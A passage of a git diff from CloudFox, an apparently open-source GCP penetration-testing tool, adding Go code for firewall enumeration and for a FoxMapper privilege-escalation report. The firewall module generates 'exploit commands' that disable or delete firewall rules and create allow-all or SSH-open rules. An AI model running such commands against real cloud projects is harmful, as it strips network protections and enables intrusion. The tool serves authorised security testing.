m.ProjectFirewallRules[projectID] = rules + + for _, network := range networks { + 
m.addNetworkToLoot(projectID, network) + } + for _, rule := range rules { + m.addFirewallRuleToLoot(projectID, rule) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d network(s), %d subnet(s), %d rule(s) in project %s", + len(networks), len(subnets), len(rules), projectID), globals.GCP_FIREWALL_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *FirewallModule) addNetworkToLoot(projectID string, network NetworkService.VPCInfo) { + lootFile := m.LootMap[projectID]["firewall-commands"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# NETWORK: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n\n"+ + "gcloud compute networks describe %s --project=%s\n"+ + "gcloud compute networks subnets list --network=%s --project=%s\n"+ + "gcloud compute firewall-rules list --filter=\"network:%s\" --project=%s\n\n", + network.Name, + network.ProjectID, + network.Name, network.ProjectID, + network.Name, network.ProjectID, + network.Name, network.ProjectID, + ) +} + +func (m *FirewallModule) addFirewallRuleToLoot(projectID string, rule NetworkService.FirewallRuleInfo) { + lootFile := m.LootMap[projectID]["firewall-commands"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# RULE: %s\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Network: %s\n"+ + "# Project: %s\n"+ + "# Direction: %s\n"+ + "# Priority: %d\n"+ + "# Disabled: %v\n", + rule.Name, rule.Network, rule.ProjectID, + rule.Direction, rule.Priority, rule.Disabled, + ) + + lootFile.Contents += fmt.Sprintf( + "\n# === ENUMERATION COMMANDS ===\n\n"+ + "# 
Describe rule:\n"+ + "gcloud compute firewall-rules describe %s --project=%s\n\n"+ + "# List all rules for this network:\n"+ + "gcloud compute firewall-rules list --filter=\"network:%s\" --project=%s --sort-by=priority\n\n", + rule.Name, rule.ProjectID, + rule.Network, rule.ProjectID, + ) + + // Exploit commands + lootFile.Contents += fmt.Sprintf( + "# === EXPLOIT COMMANDS ===\n\n"+ + "# Disable this firewall rule:\n"+ + "gcloud compute firewall-rules update %s --disabled --project=%s\n\n"+ + "# Create a permissive rule to allow all inbound traffic:\n"+ + "gcloud compute firewall-rules create cloudfox-allow-all --network=%s --allow=tcp,udp,icmp --source-ranges=0.0.0.0/0 --priority=1 --project=%s\n\n"+ + "# Create rule to allow SSH from your IP:\n"+ + "gcloud compute firewall-rules create cloudfox-ssh --network=%s --allow=tcp:22 --source-ranges=YOUR_IP/32 --priority=100 --project=%s\n\n"+ + "# Delete this firewall rule:\n"+ + "gcloud compute firewall-rules delete %s --project=%s\n\n", + rule.Name, rule.ProjectID, + rule.Network, rule.ProjectID, + rule.Network, rule.ProjectID, + rule.Name, rule.ProjectID, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *FirewallModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Generate ASCII diagram and add to loot + diagram := m.generateFirewallDiagram() + if diagram != "" { + // Add diagram to the first project's loot (or create a combined one) + for projectID := range m.LootMap { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + m.LootMap[projectID]["firewall-diagram"] = &internal.LootFile{ + Name: "firewall-diagram", + Contents: diagram, + } + break // Only add once for flat output + } + + // For hierarchical output, add to all projects + if m.Hierarchy != nil && !m.FlatOutput { + for projectID := range m.LootMap { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = 
make(map[string]*internal.LootFile) + } + m.LootMap[projectID]["firewall-diagram"] = &internal.LootFile{ + Name: "firewall-diagram", + Contents: diagram, + } + } + } + } + + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// Table headers +func (m *FirewallModule) getRulesHeader() []string { + return []string{ + "Project", "Rule Name", "Network", "Direction", + "Priority", "Source Ranges", "Allowed", "Targets", "Disabled", "Logging", + } +} + +func (m *FirewallModule) getNetworksHeader() []string { + return []string{ + "Project", "Network Name", "Routing Mode", + "Subnets", "Peerings", "Auto Subnets", + } +} + +func (m *FirewallModule) getSubnetsHeader() []string { + return []string{ + "Project", "Network", "Subnet Name", + "Region", "CIDR Range", "Private Google Access", + } +} + +// rulesToTableBody converts rules to table body rows +func (m *FirewallModule) rulesToTableBody(rules []NetworkService.FirewallRuleInfo) [][]string { + var body [][]string + for _, rule := range rules { + sources := strings.Join(rule.SourceRanges, ", ") + if sources == "" { + sources = "-" + } + + allowed := formatProtocols(rule.AllowedProtocols) + if allowed == "" { + allowed = "-" + } + + targets := "-" + if len(rule.TargetTags) > 0 { + targets = strings.Join(rule.TargetTags, ", ") + } else if len(rule.TargetSAs) > 0 { + targets = strings.Join(rule.TargetSAs, ", ") + } else { + targets = "ALL" + } + + body = append(body, []string{ + m.GetProjectName(rule.ProjectID), + rule.Name, + rule.Network, + rule.Direction, + fmt.Sprintf("%d", rule.Priority), + sources, + allowed, + targets, + shared.BoolToYesNo(rule.Disabled), + shared.BoolToYesNo(rule.LoggingEnabled), + }) + } + return body +} + +// networksToTableBody converts networks to table body rows +func (m *FirewallModule) networksToTableBody(networks []NetworkService.VPCInfo) [][]string { + var body 
[][]string + for _, network := range networks { + subnetCount := len(network.Subnetworks) + + peerings := "-" + if len(network.Peerings) > 0 { + var peerNames []string + for _, p := range network.Peerings { + peerNames = append(peerNames, p.Name) + } + peerings = strings.Join(peerNames, ", ") + } + + body = append(body, []string{ + m.GetProjectName(network.ProjectID), + network.Name, + network.RoutingMode, + fmt.Sprintf("%d", subnetCount), + peerings, + shared.BoolToYesNo(network.AutoCreateSubnetworks), + }) + } + return body +} + +// subnetsToTableBody converts subnets to table body rows +func (m *FirewallModule) subnetsToTableBody(subnets []NetworkService.SubnetInfo) [][]string { + var body [][]string + for _, subnet := range subnets { + body = append(body, []string{ + m.GetProjectName(subnet.ProjectID), + subnet.Network, + subnet.Name, + subnet.Region, + subnet.IPCidrRange, + shared.BoolToYesNo(subnet.PrivateIPGoogleAccess), + }) + } + return body +} + +// buildTablesForProject builds all tables for given project data +func (m *FirewallModule) buildTablesForProject(networks []NetworkService.VPCInfo, subnets []NetworkService.SubnetInfo, rules []NetworkService.FirewallRuleInfo) []internal.TableFile { + var tableFiles []internal.TableFile + + rulesBody := m.rulesToTableBody(rules) + if len(rulesBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_FIREWALL_MODULE_NAME + "-rules", + Header: m.getRulesHeader(), + Body: rulesBody, + }) + } + + networksBody := m.networksToTableBody(networks) + if len(networksBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_FIREWALL_MODULE_NAME + "-networks", + Header: m.getNetworksHeader(), + Body: networksBody, + }) + } + + subnetsBody := m.subnetsToTableBody(subnets) + if len(subnetsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_FIREWALL_MODULE_NAME + "-subnets", + Header: m.getSubnetsHeader(), + Body: subnetsBody, + }) + } + + 
return tableFiles +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *FirewallModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Collect all projects with data + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectNetworks { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectSubnets { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectFirewallRules { + projectsWithData[projectID] = true + } + + for projectID := range projectsWithData { + networks := m.ProjectNetworks[projectID] + subnets := m.ProjectSubnets[projectID] + rules := m.ProjectFirewallRules[projectID] + + tableFiles := m.buildTablesForProject(networks, subnets, rules) + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = FirewallOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_FIREWALL_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *FirewallModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allNetworks := m.getAllNetworks() + allSubnets := m.getAllSubnets() + allRules := 
m.getAllFirewallRules() + + tableFiles := m.buildTablesForProject(allNetworks, allSubnets, allRules) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := FirewallOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_FIREWALL_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// ------------------------------ +// Diagram Generation +// ------------------------------ + +// generateFirewallDiagram creates an ASCII visualization of firewall rules +func (m *FirewallModule) generateFirewallDiagram() string { + allRules := m.getAllFirewallRules() + if len(allRules) == 0 { + return "" + } + + // Group rules by network + rulesByNetwork := make(map[string][]NetworkService.FirewallRuleInfo) + for _, rule := range allRules { + key := rule.ProjectID + "/" + rule.Network + rulesByNetwork[key] = append(rulesByNetwork[key], rule) + } + + var sb strings.Builder + width := 90 + + // Header + sb.WriteString(diagramservice.DrawBox("GCP FIREWALL RULES DIAGRAM - Generated by CloudFox", width)) + sb.WriteString("\n") + + // Draw diagram for each network + for key, rules := range rulesByNetwork { + parts := strings.SplitN(key, "/", 2) + projectID := "" + networkName := key + if len(parts) == 2 { + projectID = parts[0] + networkName = parts[1] + } + + // Convert to diagram service types + diagramRules := 
make([]diagramservice.FirewallRuleInfo, 0, len(rules)) + for _, r := range rules { + allowedPorts := formatProtocols(r.AllowedProtocols) + if allowedPorts == "" { + allowedPorts = "*" + } + + targets := "ALL" + if len(r.TargetTags) > 0 { + targets = strings.Join(r.TargetTags, ", ") + } else if len(r.TargetSAs) > 0 { + targets = strings.Join(r.TargetSAs, ", ") + } + + diagramRules = append(diagramRules, diagramservice.FirewallRuleInfo{ + Name: r.Name, + Direction: r.Direction, + Priority: r.Priority, + SourceRanges: r.SourceRanges, + AllowedPorts: allowedPorts, + TargetTags: targets, + IsPublicIngress: r.IsPublicIngress, + Disabled: r.Disabled, + }) + } + + sb.WriteString(diagramservice.DrawFirewallDiagram(diagramRules, networkName, projectID, width)) + sb.WriteString("\n") + } + + return sb.String() +} + +// Helper functions + +// formatProtocols formats allowed/denied protocols for display +func formatProtocols(protocols map[string][]string) string { + var parts []string + for proto, ports := range protocols { + if len(ports) == 0 { + parts = append(parts, proto+":all") + } else { + parts = append(parts, proto+":"+strings.Join(ports, ",")) + } + } + return strings.Join(parts, "; ") +} + diff --git a/gcp/commands/foxmapper.go b/gcp/commands/foxmapper.go new file mode 100755 index 00000000..f9c89345 --- /dev/null +++ b/gcp/commands/foxmapper.go @@ -0,0 +1,989 @@ +package commands + +import ( + "context" + "fmt" + "path/filepath" + "sort" + "strconv" + "strings" + "sync" + + foxmapperservice "github.com/BishopFox/cloudfox/gcp/services/foxmapperService" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPFoxMapperCommand = &cobra.Command{ + Use: "foxmapper", + Aliases: []string{"fm", "pmapper"}, + Short: "Display privilege escalation data from FoxMapper graphs", + Long: `Display and analyze privilege escalation paths from FoxMapper graph data. 
+ +This command reads FoxMapper graph data (generated by 'foxmapper gcp graph create') +and displays privilege escalation analysis results. It's the GCP equivalent of +CloudFox's AWS pmapper integration. + +FoxMapper creates a graph of principals (service accounts, users, groups) and +privilege escalation edges between them. This command queries that graph to: + +1. List all admin principals +2. List all principals with paths to admin +3. Display detailed escalation paths +4. Show statistics and summaries + +FoxMapper data locations (checked in order): +- Linux: ~/.local/share/foxmapper/gcp/{org_id or project_id}/ +- macOS: ~/Library/Application Support/foxmapper/gcp/{org_id or project_id}/ +- Windows: %APPDATA%/foxmapper/gcp/{org_id or project_id}/ + +To generate FoxMapper data, run: + foxmapper gcp graph create --org {org_id} + foxmapper gcp graph create --project {project_id} + +Examples: + # Display privesc analysis for an organization + cloudfox gcp foxmapper --org 123456789 + + # Display privesc analysis for a specific project + cloudfox gcp foxmapper --project my-project + + # Use a custom FoxMapper data path + cloudfox gcp foxmapper --foxmapper-path /path/to/foxmapper/gcp/123456789`, + Run: runGCPFoxMapperCommand, +} + +// Module-specific flags +var ( + foxmapperOrgID string + foxmapperProjectID string + foxmapperDataPath string +) + +func init() { + GCPFoxMapperCommand.Flags().StringVar(&foxmapperOrgID, "org", "", "Organization ID to analyze") + GCPFoxMapperCommand.Flags().StringVar(&foxmapperProjectID, "project", "", "Project ID to analyze (if not using org)") + GCPFoxMapperCommand.Flags().StringVar(&foxmapperDataPath, "foxmapper-path", "", "Custom path to FoxMapper data directory") +} + +// FoxMapperModule holds the state for the FoxMapper command +type FoxMapperModule struct { + gcpinternal.BaseGCPModule + + FoxMapper *foxmapperservice.FoxMapperService + OrgID string + ProjectID string + DataPath string + OrgCache *gcpinternal.OrgCache + + // Output 
data + Admins []*foxmapperservice.Node + NodesWithPrivesc []*foxmapperservice.Node + Summary map[string]interface{} + LootMap map[string]*internal.LootFile + + mu sync.Mutex +} + +type FoxMapperOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o FoxMapperOutput) TableFiles() []internal.TableFile { return o.Table } +func (o FoxMapperOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPFoxMapperCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, "foxmapper") + if err != nil { + return + } + + module := &FoxMapperModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + FoxMapper: foxmapperservice.New(), + OrgID: foxmapperOrgID, + ProjectID: foxmapperProjectID, + DataPath: foxmapperDataPath, + LootMap: make(map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *FoxMapperModule) Execute(ctx context.Context, logger internal.Logger) { + // Get OrgCache for project number resolution + m.OrgCache = gcpinternal.GetOrgCacheFromContext(ctx) + + logger.InfoM("Looking for FoxMapper data and building privilege escalation graph...", "foxmapper") + + // Custom path specified - load directly + if m.DataPath != "" { + if err := m.FoxMapper.LoadGraphFromPath(m.DataPath); err != nil { + logger.ErrorM(fmt.Sprintf("Failed to load FoxMapper data from path: %v", err), "foxmapper") + return + } + m.analyzeAndOutput(ctx, logger, m.DataPath) + return + } + + // Specific org specified + if m.OrgID != "" { + if err := m.FoxMapper.LoadGraph(m.OrgID, true); err != nil { + logger.ErrorM(fmt.Sprintf("Failed to load FoxMapper data for org %s: %v", m.OrgID, err), "foxmapper") + fmt.Printf("\nTo generate FoxMapper data, run:\n foxmapper gcp graph create --org %s\n", m.OrgID) + return + } + m.analyzeAndOutput(ctx, logger, m.OrgID) + return + } + + // Specific project specified via module flag + if m.ProjectID != "" { + if err := 
m.FoxMapper.LoadGraph(m.ProjectID, false); err != nil { + logger.ErrorM(fmt.Sprintf("Failed to load FoxMapper data for project %s: %v", m.ProjectID, err), "foxmapper") + fmt.Printf("\nTo generate FoxMapper data, run:\n foxmapper gcp graph create --project %s\n", m.ProjectID) + return + } + m.analyzeAndOutput(ctx, logger, m.ProjectID) + return + } + + // No specific identifier - try org from hierarchy, then iterate projects + orgID := "" + if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } + + // Try org-level graph first (covers all projects) + if orgID != "" { + if err := m.FoxMapper.LoadGraph(orgID, true); err == nil { + logger.InfoM(fmt.Sprintf("Loaded org-level FoxMapper graph for org: %s", orgID), "foxmapper") + m.analyzeAndOutput(ctx, logger, orgID) + return + } + } + + // No org graph - try each project + if len(m.ProjectIDs) == 0 { + logger.ErrorM("No organization or project specified. Use --org or --project flag.", "foxmapper") + logger.InfoM("To generate FoxMapper data, run:", "foxmapper") + logger.InfoM(" foxmapper gcp graph create --org {org_id}", "foxmapper") + logger.InfoM(" foxmapper gcp graph create --project {project_id}", "foxmapper") + return + } + + // Build hierarchical output for per-project analysis + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + foundAny := false + for _, projectID := range m.ProjectIDs { + // Create fresh FoxMapper service for each project + projectFM := foxmapperservice.New() + if err := projectFM.LoadGraph(projectID, false); err != nil { + // No FoxMapper data for this project - skip silently + continue + } + + foundAny = true + logger.InfoM(fmt.Sprintf("Loaded FoxMapper graph for project %s: %d nodes, %d edges", + projectID, len(projectFM.Nodes), len(projectFM.Edges)), "foxmapper") + + // Analyze this project + admins := 
projectFM.GetAdminNodes() + nodesWithPrivesc := projectFM.GetNodesWithPrivesc() + summary := projectFM.GetPrivescSummary() + + // Generate output for this project + output := m.generateOutputForProject(logger, projectID, projectFM, admins, nodesWithPrivesc, summary) + outputData.ProjectLevelData[projectID] = output + + // Print summary for this project + m.printProjectSummary(logger, projectID, summary) + } + + if !foundAny { + logger.ErrorM("No FoxMapper data found for any project.", "foxmapper") + fmt.Println("\nTo generate FoxMapper data, run:") + fmt.Println(" foxmapper gcp graph create --org {org_id}") + fmt.Println(" foxmapper gcp graph create --project {project_id}") + fmt.Println("\nFor more info: https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#foxmapper") + return + } + + // Write hierarchical output + pathBuilder := m.BuildPathBuilder() + if err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData); err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), "foxmapper") + } +} + +// analyzeAndOutput analyzes a single loaded FoxMapper graph and writes output +func (m *FoxMapperModule) analyzeAndOutput(ctx context.Context, logger internal.Logger, identifier string) { + logger.InfoM(fmt.Sprintf("Loaded FoxMapper graph: %d nodes, %d edges", + len(m.FoxMapper.Nodes), len(m.FoxMapper.Edges)), "foxmapper") + + // Get analysis data + m.Admins = m.FoxMapper.GetAdminNodes() + m.NodesWithPrivesc = m.FoxMapper.GetNodesWithPrivesc() + m.Summary = m.FoxMapper.GetPrivescSummary() + + // Generate output + output := m.generateOutput(logger, identifier) + + // For org-level or single identifier, use hierarchical output at org level + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + outputData.OrgLevelData[identifier] = output + + pathBuilder := m.BuildPathBuilder() + if 
err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData); err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), "foxmapper") + } + + // Print summary + m.printSummary(logger, identifier) +} + +// generateOutputForProject generates output for a specific project's FoxMapper data +func (m *FoxMapperModule) generateOutputForProject(logger internal.Logger, projectID string, fm *foxmapperservice.FoxMapperService, admins []*foxmapperservice.Node, nodesWithPrivesc []*foxmapperservice.Node, summary map[string]interface{}) FoxMapperOutput { + var output FoxMapperOutput + + // Main table: principals with admin or path to admin + // Read left to right: Project -> Type -> Principal -> Admin Status -> Privesc Target -> Privesc Admin Level -> Hops + mainHeader := []string{"Project", "Type", "Principal", "Is Admin", "Admin Level", "Privesc To", "Privesc Admin Level", "Hops", "Confidence"} + var mainBody [][]string + + // First add admins + for _, admin := range admins { + adminLevel := admin.AdminLevel + if adminLevel == "" { + adminLevel = "project" + } + mainBody = append(mainBody, []string{ + admin.ProjectID, + admin.MemberType, + admin.Email, + "Yes", + adminLevel, + "-", + "-", + "-", + "-", + }) + } + + // Then add nodes with privesc paths + for _, node := range nodesWithPrivesc { + paths := fm.GetPrivescPaths(node.Email) + shortestPath := "-" + privescTo := "-" + privescAdminLevel := "-" + confidence := "-" + if len(paths) > 0 { + bestPath := paths[0] + shortestPath = strconv.Itoa(bestPath.HopCount) + // Get the destination (admin) from the best path + privescTo = bestPath.Destination + // Clean up the display + if strings.HasPrefix(privescTo, "serviceAccount:") { + privescTo = strings.TrimPrefix(privescTo, "serviceAccount:") + } else if strings.HasPrefix(privescTo, "user:") { + privescTo = strings.TrimPrefix(privescTo, "user:") + } + + // Confidence from the best path + confidence = 
bestPath.Confidence + if confidence == "" { + confidence = "high" + } + + // Format privesc admin level + destNode := fm.GetNode(bestPath.Destination) + switch bestPath.AdminLevel { + case "org": + privescAdminLevel = "Org" + case "folder": + // Try to extract folder from the destination node's IAM bindings + if destNode != nil && len(destNode.IAMBindings) > 0 { + for _, binding := range destNode.IAMBindings { + if resource, ok := binding["resource"].(string); ok { + if strings.HasPrefix(resource, "folders/") { + folderID := strings.TrimPrefix(resource, "folders/") + privescAdminLevel = fmt.Sprintf("Folder: %s", folderID) + break + } + } + } + } + if privescAdminLevel == "-" { + privescAdminLevel = "Folder" + } + case "project": + // Try to get the project ID from the destination node or principal + if destNode != nil && destNode.ProjectID != "" { + privescAdminLevel = fmt.Sprintf("Project: %s", destNode.ProjectID) + } else { + destProject := extractProjectFromPrincipal(bestPath.Destination, m.OrgCache) + if destProject != "" { + privescAdminLevel = fmt.Sprintf("Project: %s", destProject) + } else { + privescAdminLevel = "Project" + } + } + default: + if bestPath.AdminLevel != "" { + privescAdminLevel = bestPath.AdminLevel + } + } + } + mainBody = append(mainBody, []string{ + node.ProjectID, + node.MemberType, + node.Email, + "No", + "-", + privescTo, + privescAdminLevel, + shortestPath, + confidence, + }) + } + + output.Table = append(output.Table, internal.TableFile{ + Header: mainHeader, + Body: mainBody, + Name: "foxmapper", + }) + + // Loot file - summary + lootContent := m.generateLootContentForProject(projectID, fm, admins, nodesWithPrivesc, summary) + output.Loot = append(output.Loot, internal.LootFile{ + Name: "foxmapper", + Contents: lootContent, + }) + + // Loot file - detailed paths (paths go to loot only, not table/csv/json) + pathsLootContent := m.generatePathsLootContentForProject(projectID, fm, nodesWithPrivesc) + output.Loot = append(output.Loot, 
internal.LootFile{ + Name: "foxmapper-paths", + Contents: pathsLootContent, + }) + + return output +} + +// generatePathsLootContentForProject generates detailed paths loot for a specific project +func (m *FoxMapperModule) generatePathsLootContentForProject(projectID string, fm *foxmapperservice.FoxMapperService, nodesWithPrivesc []*foxmapperservice.Node) string { + var sb strings.Builder + + sb.WriteString("# FoxMapper Privilege Escalation Paths\n") + sb.WriteString(fmt.Sprintf("# Project: %s\n", projectID)) + sb.WriteString(fmt.Sprintf("# Total paths: %d principals with escalation paths\n\n", len(nodesWithPrivesc))) + + for _, node := range nodesWithPrivesc { + paths := fm.GetPrivescPaths(node.Email) + if len(paths) == 0 { + continue + } + + sb.WriteString(fmt.Sprintf("================================================================================\n")) + sb.WriteString(fmt.Sprintf("SOURCE: %s (%s)\n", node.Email, node.MemberType)) + sb.WriteString(fmt.Sprintf("Project: %s\n", node.ProjectID)) + sb.WriteString(fmt.Sprintf("Escalation paths: %d\n", len(paths))) + sb.WriteString(fmt.Sprintf("================================================================================\n\n")) + + for pathIdx, path := range paths { + scopeStatus := "" + if path.ScopeBlocked { + scopeStatus = " [SCOPE-BLOCKED]" + } + confidenceStatus := "" + if path.Confidence != "" && path.Confidence != "high" { + confidenceStatus = fmt.Sprintf(" [%s confidence]", path.Confidence) + } + + sb.WriteString(fmt.Sprintf("--- Path %d: %s → %s (%s admin, %d hops)%s%s ---\n\n", + pathIdx+1, path.Source, path.Destination, path.AdminLevel, path.HopCount, scopeStatus, confidenceStatus)) + + // Show the path as a visual chain + sb.WriteString(fmt.Sprintf(" %s\n", path.Source)) + for i, edge := range path.Edges { + sb.WriteString(" │\n") + + annotations := "" + if edge.ScopeBlocksEscalation { + annotations = " ⚠️ BLOCKED BY OAUTH SCOPE" + } else if edge.ScopeLimited { + annotations = " ⚠️ scope-limited" + } + 
edgeConf := edge.EffectiveConfidence() + if edgeConf != "high" { + annotations += fmt.Sprintf(" [%s confidence]", edgeConf) + } + + sb.WriteString(fmt.Sprintf(" ├── [%d] %s%s\n", i+1, edge.ShortReason, annotations)) + + if edge.Resource != "" { + sb.WriteString(fmt.Sprintf(" │ Resource: %s\n", edge.Resource)) + } + + if edge.Reason != "" && edge.Reason != edge.ShortReason { + reason := edge.Reason + if len(reason) > 80 { + sb.WriteString(fmt.Sprintf(" │ %s\n", reason[:80])) + sb.WriteString(fmt.Sprintf(" │ %s\n", reason[80:])) + } else { + sb.WriteString(fmt.Sprintf(" │ %s\n", reason)) + } + } + + if i < len(path.Edges)-1 { + sb.WriteString(fmt.Sprintf(" │\n")) + sb.WriteString(fmt.Sprintf(" ▼\n")) + sb.WriteString(fmt.Sprintf(" %s\n", edge.Destination)) + } else { + sb.WriteString(fmt.Sprintf(" │\n")) + sb.WriteString(fmt.Sprintf(" └──▶ %s (ADMIN)\n", edge.Destination)) + } + } + sb.WriteString("\n") + } + sb.WriteString("\n") + } + + return sb.String() +} + +// generateLootContentForProject generates loot content for a specific project +func (m *FoxMapperModule) generateLootContentForProject(projectID string, fm *foxmapperservice.FoxMapperService, admins []*foxmapperservice.Node, nodesWithPrivesc []*foxmapperservice.Node, summary map[string]interface{}) string { + var sb strings.Builder + + sb.WriteString("=== FoxMapper Privilege Escalation Analysis ===\n\n") + sb.WriteString(fmt.Sprintf("Project: %s\n", projectID)) + sb.WriteString(fmt.Sprintf("Total Nodes: %d\n", summary["total_nodes"])) + sb.WriteString(fmt.Sprintf("Admin Nodes: %d\n", summary["admin_nodes"])) + sb.WriteString(fmt.Sprintf("Nodes with Privesc: %d\n", summary["nodes_with_privesc"])) + sb.WriteString(fmt.Sprintf("Percent with Privesc: %.1f%%\n\n", summary["percent_with_privesc"])) + + // Admin breakdown + sb.WriteString("=== Admin Breakdown ===\n") + sb.WriteString(fmt.Sprintf(" Organization Admins: %d\n", summary["org_admins"])) + sb.WriteString(fmt.Sprintf(" Folder Admins: %d\n", 
summary["folder_admins"])) + sb.WriteString(fmt.Sprintf(" Project Admins: %d\n\n", summary["project_admins"])) + + // List admins + sb.WriteString("=== Admin Principals ===\n") + for _, admin := range admins { + adminLevel := admin.AdminLevel + if adminLevel == "" { + adminLevel = "project" + } + sb.WriteString(fmt.Sprintf("ADMIN (%s): %s\n", adminLevel, admin.Email)) + } + sb.WriteString("\n") + + // List privesc paths + sb.WriteString("=== Privilege Escalation Paths ===\n\n") + for _, node := range nodesWithPrivesc { + paths := fm.GetPrivescPaths(node.Email) + for _, path := range paths { + sb.WriteString(fmt.Sprintf("PATH TO %s ADMIN FOUND\n", strings.ToUpper(path.AdminLevel))) + sb.WriteString(fmt.Sprintf(" Start: %s\n", path.Source)) + sb.WriteString(fmt.Sprintf(" End: %s\n", path.Destination)) + sb.WriteString(fmt.Sprintf(" Hops: %d\n", path.HopCount)) + if path.Confidence != "" && path.Confidence != "high" { + sb.WriteString(fmt.Sprintf(" Confidence: %s\n", path.Confidence)) + } + if path.ScopeBlocked { + sb.WriteString(" WARNING: Path may be blocked by OAuth scopes\n") + } + sb.WriteString(" Path:\n") + for i, edge := range path.Edges { + annotations := "" + if edge.ScopeBlocksEscalation { + annotations = " [BLOCKED BY SCOPE]" + } else if edge.ScopeLimited { + annotations = " [scope-limited]" + } + edgeConf := edge.EffectiveConfidence() + if edgeConf != "high" { + annotations += fmt.Sprintf(" [%s confidence]", edgeConf) + } + sb.WriteString(fmt.Sprintf(" (%d) %s%s\n", i+1, edge.Reason, annotations)) + } + sb.WriteString("\n") + } + } + + return sb.String() +} + +// printProjectSummary prints a summary for a single project +func (m *FoxMapperModule) printProjectSummary(logger internal.Logger, projectID string, summary map[string]interface{}) { + totalNodes, _ := summary["total_nodes"].(int) + adminNodes, _ := summary["admin_nodes"].(int) + nodesWithPrivesc, _ := summary["nodes_with_privesc"].(int) + + logger.InfoM(fmt.Sprintf("[%s] %d principals, %d admins, 
